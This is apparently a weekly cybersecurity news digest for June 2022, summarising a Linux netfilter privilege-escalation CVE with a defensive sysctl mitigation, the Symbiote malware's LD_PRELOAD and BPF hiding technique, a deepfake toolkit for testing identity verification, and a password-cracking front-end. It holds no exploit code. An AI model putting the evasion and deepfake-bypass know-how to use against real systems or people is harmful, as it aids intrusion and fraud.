Weekly in Security 202223

2022-06-06 to 2022-06-13

2 min read - 377 words

Introduction

Weekly in Security is a summary of the cybersecurity news from the past week. This post covers 2022-06-06 to 2022-06-13.

Vulnerabilities

CVE-2022-1966 - Local privilege escalation via use-after-free in netfilter

A use-after-free write vulnerability was identified within the netfilter subsystem which can be exploited to achieve privilege escalation to root. In order to trigger the issue it requires the ability to create user/net namespaces.

The author included a proof-of-concept code in his article. The kernel repository already includes an update. Until this is available for all systems it usually takes quite some time.

As a mitigation user namespaces can be disabled. These privileges are usually only required on containerized systems.

echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
sysctl -p /etc/sysctl.d/userns.conf

News

Symbiote Deep-Dive

The company released an article about an undetectable Linux malware. The analysis is based on the vendor provided tool Intezer Analyse. Technically, the malware is using LD_PRELOAD T1574.006 and relies on BPF byte code.

BPF bytecode is injected into the kernel that defines which packets should be captured. In this process, Symbiote adds its bytecode first so it can filter out network traffic that it doesn’t want the packet-capturing software to see.

One similar malware sample is BFPdoor (VirusTotal).

Tools

Deepfake Offensive Toolkit

dot (aka Deepfake Offensive Toolkit) makes real-time, controllable deepfakes ready for virtual cameras injection. dot is created for performing penetration testing against e.g. identity verification and video conferencing systems, for the use by security analysts, Red Team members, and biometrics researchers.

This also sounds like a great toolkit for social engineering engagements.

Hashview

A web front-end for password cracking and analytics

The version v0.8.0-Beta was released. This version is a complete rewrite from v0.7.4.